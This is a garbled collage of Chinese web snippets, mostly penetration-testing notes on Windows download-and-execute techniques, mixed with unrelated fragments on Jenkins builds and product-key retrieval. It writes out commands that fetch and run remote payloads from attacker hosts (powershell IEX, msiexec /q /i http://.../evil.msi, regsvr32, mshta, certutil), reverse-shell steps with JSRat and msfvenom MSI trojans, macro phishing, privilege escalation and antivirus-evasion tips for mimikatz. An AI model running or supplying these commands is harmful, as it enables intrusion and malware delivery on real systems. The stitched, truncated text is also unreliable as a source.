RDP端口的反向SSH连接,威胁参与者成功地建立了到beachhead服务器的交互式RDP会话,并开始列举网络上的其他计算机 从beachhead通过RDP横向移动到另外三台服务器,包括一台域控制器、一台文件服务器和另一台服务器...) 可以看到主要区别是有趣的PDB路径m:\work\shellll\和.NET版本的不同 应用日志 我们可以从Catalina.txt日志中看到当威胁参与者运行fxs.bat(RDP隧道)等特定命令时...,应用程序认为进程被挂起(运行30秒以上)并创建一条警告消息 [REDACTED]|[REDACTED]|[org.apache.catalina.valves.StuckThreadDetectionValve...-44077也很关键,在入侵的后期攻击者转储LSASS进程(参见凭证访问一节),在泄漏LSASS转储之后,攻击者删除了转储文件以隐藏他们的踪迹 从LSASS转储中获取凭证后威胁参与者返回到环境中并下载名为...shell fm2.jsp在主机上执行他们的初始发现,下面是发送到webshell的GET请求,发现命令传递给cmd参数,该参数作为PowerShell运行 powershell.exe reg query
是通过gitlab进行代码管理。 那么如何采用Jenkins将项目从GitLab上拉取。并进行构造打包成apk。 先从最基本简单的方法来实现。 1.准备工作 我们都知道如果要打包Android 。...因为构建过程中,JenKins会从本地拉取各种信息和配置数据,如果你的配置数据要进行每次的修改替换。...而是告诉jenkins 从哪个目录下获取构造结果。 然后jenkins再根据这个路径在网页中提供一个访问链接。 配置方法:示例 全部配置完毕后,我们只要点击构建等待结果即可。 3.
/putty.exe Windows环境,需要将该exe释放到指定目录并执行,例如c:\download 问:通过cmd实现的最短代码是多少字符?...->download&exec JScript调用powershell实现下载执行的代码为: new ActiveXObject("WScript.Shell").Run("powershell (new-object...): regsve32->JScript->powershell->download&exec 6、msiexec 该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到...System权限》有过介绍,细节不再赘述 首先将powershell实现下载执行的代码作base64编码: $fileContent = "(new-object System.Net.WebClient...http和htpps 但mshta在执行hta脚本时,类似于浏览器,会根据链接返回头进行对应的解析操作,所以这里只有当返回头为html时才会运行 否则会被当普通文本进行解析 对于github的代码,返回的格式为
id=1586899175661391940&wfr=spider&for=pc],利用Windows系统自带的msiexec程序下载并远程运行msi文件,以达到执行特定命令的目的。...安装完Wix工具后执行下列前两条命令,会在同目录下生成一个calc.msi文件,最后一条命令表示远程下载并利用msiexec运行calc.msi文件。...首先配置好empire,具体的配置内容可以参考这篇文章[https://mari0er.club/post/empire.html],之后将生成的powershell代码复制粘贴到wix模板的第15行,...此时打开Word文档就会远程执行下载和安装msi木马的命令,进一步运行powershell进行反弹。...其实还有很多其他的利用方法,比如利用msiexec直接下载并运行msfvenom制作的msi木马文件,可以直接获得meterpreter会话。但是,需要提前对msi木马文件进行免杀处理。 ? ?
1.服务未运行:攻击者会使用任意服务来替换原来的服务,然后重启服务。 2.服务正在运行且无法被终止:这种情况符合绝大多数的漏洞利用情景,攻击者通常会利用DLL劫持技术并尝试重启服务来提权。...windows install通过msiexec.exe安装MSI文件,双击MSI文件就会运行msiexec.exe。...msiexec.exe /q /i UserAdd.msi ?...3.获取组策略的凭据 1.手动查找 浏览SysVQL文件夹,获取相关文件 ? 也可以使用type命令搜索。...2.使用powershell获取cpassword 下载地址: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/
常见技巧 powershell PowerShell 是一种跨平台的任务自动化和配置管理框架,由命令行管理程序和脚本语言组成,与大多数接受并返回文本的shell不同,PowerShell 构建在 .NET...公共语言运行时(CLR)的基础之上,接受并返回.NET 对象,这一根本上的改变引入了全新的自动化工具和方法。.../192.168.174.129:1234/shell.ps1'))" Step 5:之后再web服务器中收到一条请求记录 Step 6:在MSF端成功收到反弹的shell msiexec msiexec.exe...属于系统进程,是Windows Installer的一部分,用于安装Windows Installer安装包(MSI),对系统的正常运行非常重要,一般在运行Microsoft Update安装更新或安装部分软件的时候出现...JSRat监听本地5678端口: Step 1:运行JSRat监听本地5678端口 .
常见技巧 powershell PowerShell 是一种跨平台的任务自动化和配置管理框架,由命令行管理程序和脚本语言组成,与大多数接受并返回文本的shell不同,PowerShell 构建在 .NET...公共语言运行时(CLR)的基础之上,接受并返回.NET 对象,这一根本上的改变引入了全新的自动化工具和方法。...msiexec msiexec.exe属于系统进程,是Windows Installer的一部分,用于安装Windows Installer安装包(MSI),对系统的正常运行非常重要,一般在运行Microsoft...Step 4:在目标主机中执行以下命令实现无文件落地执行载荷 msiexec /q /i http://192.168.174.129:1234/evil.msi ?...Step 5:之后再web端成功接收到请求记录,同时在NC端返回cmd命令交互 ?
普通电脑上要获取windows productkey,管理员身份打开cmd,执行这句命令即可 powershell "(Get-WmiObject -query 'select * from SoftwareLicensingService...Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\' 就能获取...ProduKey.exe也可以命令行查看productkey,可以搞自动化代码 接下来运行代码 ≤2012R2 的系统,cmd,注意是cmd不是powershell,在cmd命令行来运行如下命令: certutil...②cmd和powershell在7z.exe解压.zip文件的代码上有差别,powershell要在前面加&, -aoa代表覆盖,用法介绍里有一句:-ao{a|s|t|u} : set Overwrite...④powershell加Tls12那句是因为https://cloud.tencent.com/developer/article/1885847 总之,windows代码兼容性要强,需要兼顾的太多了。
windows 命令行自带工具 PowerShell PowerShell是一种跨平台的任务自动化和配置管理框架,由命令行管理程序和脚本语言组成,与大多数接受并返回文本的 shell 不同,PowerShell...构建在 .NET公共语言运行时 (CLR) 的基础之上,接受并返回.NET对象,这从根本上的改变引入了全新的自动化工具和方法。...msiexec msiexec是windows自带的cmd工具,支持远程下载功能,攻击者可以将msi文件上传到服务器并执行,下面通过一个实例做演示说明,首先我们通过msfvenom来构造一个恶意的msi...之后在目标主机上通过msiexec来实现远程下载文件并执行,该方法同样可以实现无文件落地攻击: msiexec /q /i http://192.168.174.131:1234/evil.msi ?...如果目标主机有安装notpad那么你可以通过下面这种方式快速的从一个URL或者UNC路径当中下载文件到本地并执行来获取shell:首先,打开notpad++,之后点击"文件—>打开": ?
在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。...Powershell 利用powershell远程执行ps1脚本。...regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll 06、wmic 执行WMIC以下命令从远程服务器下载并运行恶意...msiexec /q /i http://192.168.28.128/evil.msi 08、IEExec IEexec.exe应用程序是.NET Framework附带程序,运行IEExec.exe...并使用url启动其他程序。
该漏洞执行的前提,是需要先获取到一个普通用户的用户名、口令。 ?...通过查看网页源代码,可以找到版本号15.0.1497: ?...输入ysoserial获取的payload,得到exp并执行: ? //执行后服务器会返回500 Dnslog显示命令执行成功: ? 通过cs生成powershell payload: ?...输入获取的payload并执行: ?...//也可以用msiexec命令:msiexec /q /i http://url Dnslog未接受到请求: ? //尝试到此,判断为漏洞存在,但可能被杀软拦截或者TCP不出网。 ?
在这里,本文收集了15种常见的文件下载执行的方式,并结合具体案例,让我们一起来看看是怎么实现的吧。...---- 1、PowerShell PowerShell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用。...项目地址: https://github.com/Hood3dRob1n/JSRat-Py.git 步骤一:开始运行JSRat,监听本地8888端口。 ? 步骤二:通过url访问,可以查看恶意代码。...{new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 步骤三:在受害者PC运行该代码...,将成功返回一个会话,如下图所示: ?
简介 在各种钓鱼、挖矿、勒索、组建僵尸网络、基础渗透、后渗透过程当中,攻击者都会通过一些方法去下载执行恶意代码并执行完成攻击操作,比如前段时间通过Office DDE执行powershell.../test.jpg -O test.jpg) 当然也可以从UVC读取 powershell -exec bypass -f \\webdavserver\folder\payload.ps1...代码并执行这些代码。.../2017/06/16/applocker-bypass-msiexec/ Mshta Msht具有执行内联脚本的能力,它将下载并执行一个脚本作为有效负载: mshta vbscript:Close...但是,这个二进制文件可以用来执行恶意的JavaScript代码并绕过应用程序白名单保护。
sct certutil.exe winrm.vbs msiexec.exe wmic.exe pubprn.vbs 参考 加载脚本方式 利用Windows自带的解析器:PowerShell、VBScript...、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.exe和mshta.exe。...利用上传或远程加载对应payload脚本,直接调用解析器运行(可以使用Invoke-Obfuscation或者 Invoke-DOSfuscation 等进行混淆) 用Windows自带的工具或脚本等原生工具实现执行恶意代码...run windows执行 mshta http://192.168.164.128:8080/lWdH9aFeeIe.hta CScript.exe&WScript.exe 上述两个工具都可以解析运行...C:\Windows\System32\msiexec.exe /q /i http://192.168.164.128:8080/123.msi 复现出错 wmic.exe # 暂无 pubprn.vbs
,提示要添加的用户 Invoke-WScriptUACBypass #通过滥用 wscript.exe 中缺少嵌入清单来执行旁路 UAC 攻击 Invoke-PrivescAudit #运行所有当前的升级检查并返回一个报告...替换服务的二进制文件 Get-ModifiableServiceFile #枚举所有服务,并返回脆弱的服务文件。...Get-ModifiableService #枚举当前用户可以修改 binPath 的所有服务并返回服务。...Get-ModifiableService #枚举当前用户可以修改 binPath 的所有服务并返回服务。...笔者的答案是代码复用。 使用 DLL 有助于促进代码的模块化、代码重用、内存的有效使用和减少所占用的磁盘空间。因此,操作系统和程序能够更快地加载和运行,并且在计算机中占用较少的磁盘空间。
简介 在各种钓鱼、挖矿、勒索、组建僵尸网络、基础渗透、后渗透过程当中,攻击者都会通过一些方法去下载执行恶意代码并执行完成攻击操作,比如前段时间通过Office DDE执行powershell的,利用宏执行...reverse-tcp.xyz/test.jpg -O test.jpg) 当然也可以从UVC读取 powershell -exec bypass -f \\webdavserver\folder...代码并执行这些代码。.../2017/06/16/applocker-bypass-msiexec/ Mshta Msht具有执行内联脚本的能力,它将下载并执行一个脚本作为有效负载: mshta vbscript:Close...但是,这个二进制文件可以用来执行恶意的JavaScript代码并绕过应用程序白名单保护。
所以,最后是把相关代码放在自己的vps上,我就直接放我的内网另外的pc上了。 powershell依旧会被360行为拦截。 ?...方法4-使用xencrypt加密(VT查杀率2/59) 该方法主要是使用工具对powershell脚本进行加密并采用Gzip/DEFLATE来绕过杀软。...方法6-C程序中执行powershell(VT查杀率7/71) 这个执行方式也是比较简单,在C代码里执行powershell。...将mimi.bin作base64编码并保存在剪贴板,powershell命令如下: $filename = "mimi.bin" [Convert]::ToBase64String([IO.File]:...方法13-msiexec加载mimikatz(VT查杀率25/60) 参考远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60):https://mp.weixin.qq.com
例如,一个WebShell权限通过提权,拥有了管理员权限 横向提权:获取同级别角色的权限。...系统服务权限配置错误(可写目录漏洞)有如下两种可能: 服务未运行:攻击者会使用任意服务替换原来的服务,然后重启服务 服务正在运行且无法被终止:攻击者通常会利用DLL劫持技术并尝试重启服务来提权。...,该模块会尝试创建并运行一个新的服务 如果当前权限不允许创建服务,该模块会判断哪些服务的文件或者文件夹的权限有问题,并允许对其进行劫持 2、注册表键AlwaysInstallElevated 注册表键AlwaysInstallElevated...Windows Installer通过Msiexec.exe安装MSI文件包含的程序,双击MSI文件就会运行Msiexec.exe。...其团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。
当受害者双击之后就会自动执行我们的恶意payload,从目标网站下载并执行。 最终被得到 shell。...但是双击运行还是 exe 格式运行的。 再利用ResourceHacker修改图标。 找个小姐姐图片转换为 ico 格式。...没做任何处理之前,VT查杀 39/61 从GUI隐藏/取消隐藏宏VT查杀 37/60 在VBA GUI编辑器中隐藏所有宏模块(默认的“ ThisDocument”模块除外)。...思路: 编写一个带有宏代码的DOTM文档,上传服务器 编写一个能够远程连接的DOCX文档 将该文档压缩找到并更改settings.xml.rels文件中的内容,将其中的target内容修改为服务器上DOTM...2.9 超链接 在PDF、Office文档中内嵌一个跳转链接是很早期的钓鱼方式,通过文字信息的引导,让受害者点开页面,如果缺乏戒心,就可能会获取到受害者的账号、密码、银行卡、身份证等信息。
领取专属 10元无门槛券
手把手带您无忧上云